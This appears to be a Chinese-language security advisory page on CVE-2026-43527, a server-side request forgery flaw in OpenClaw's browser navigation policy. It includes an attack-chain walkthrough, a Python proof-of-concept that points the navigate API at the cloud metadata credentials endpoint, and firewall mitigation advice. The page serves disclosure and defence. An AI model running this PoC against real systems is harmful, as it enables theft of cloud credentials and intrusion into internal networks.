IPBUF安全漏洞报告
English
CVE-2026-43527 CVSS 7.7 高危

CVE-2026-43527 OpenClaw服务端请求伪造漏洞

披露日期: 2026-05-05

漏洞信息

漏洞编号
CVE-2026-43527
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.7 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

SSRFOpenClaw内网探测信息泄露CVE-2026-43527

漏洞概述

OpenClaw在2026.4.14之前的版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞源于其浏览器SSRF策略的默认配置不当,允许导航至私有网络。攻击者可利用此配置缺陷,通过浏览器驱动的请求访问内部服务或云平台元数据端点,从而导致敏感信息泄露。

技术细节

该漏洞的根本原因在于OpenClaw的浏览器组件在处理SSRF策略时配置错误。在默认情况下,该组件未对请求目标进行严格的网络边界校验,允许浏览器导航至私有网络地址(如RFC 1918定义的内网段)及本地回环地址。攻击者可利用这一缺陷,构造特定的URL参数(指向云元数据服务或内网管理后台),诱导服务器端浏览器发起请求。由于该漏洞CVSS评分为7.7,且具备范围影响(S:C),成功的利用不仅可能导致敏感信息(如IAM临时凭证、配置文件)泄露,还可能作为内网横向移动的跳板。攻击过程无需用户交互,仅需低权限即可触发,极大降低了攻击门槛。

攻击链分析

STEP 1
1. 初始访问
攻击者获取OpenClaw平台的低权限用户账号(PR:L)。
STEP 2
2. 漏洞探测
攻击者向OpenClaw的浏览器导航接口发送请求,目标地址设置为内网回环地址或元数据服务IP(如169.254.169.254),以测试是否存在SSRF。
STEP 3
3. 执行攻击
由于系统默认允许私有网络导航,服务器端浏览器被诱导访问内网敏感资源,并返回响应内容给攻击者。
STEP 4
4. 数据窃取与横向移动
攻击者解析获取的元数据(如AWS IAM凭证),利用凭证访问云环境中的其他资源,进一步渗透内网。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: OpenClaw SSRF PoC (CVE-2026-43527) # Description: PoC to demonstrate internal network access via vulnerable OpenClaw browser policy target_host = "http://vulnerable-openclaw-instance.com" # Common internal metadata endpoint (e.g., AWS, GCP, Azure) # Attacker aims to retrieve cloud instance credentials ssrf_payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # The vulnerable endpoint that processes the URL in the browser component vulnerable_endpoint = f"{target_host}/api/v1/browser/navigate" payload = { "url": ssrf_payload, "options": { "timeout": 5000 } } try: print(f"[*] Attempting SSRF against {target_host}...") response = requests.post(vulnerable_endpoint, json=payload) if response.status_code == 200: print("[+] Request sent successfully. Check response for leaked metadata.") print("[+] Response Body:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

OpenClaw < 2026.4.14

防御指南

临时缓解措施
如果无法立即升级,建议管理员在网络防火墙或安全组层面阻断OpenClaw服务主机访问RFC 1918定义的私有网段及链路本地地址。同时,应暂时禁用低权限用户调用浏览器导航相关接口的权限,直至修复完成。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表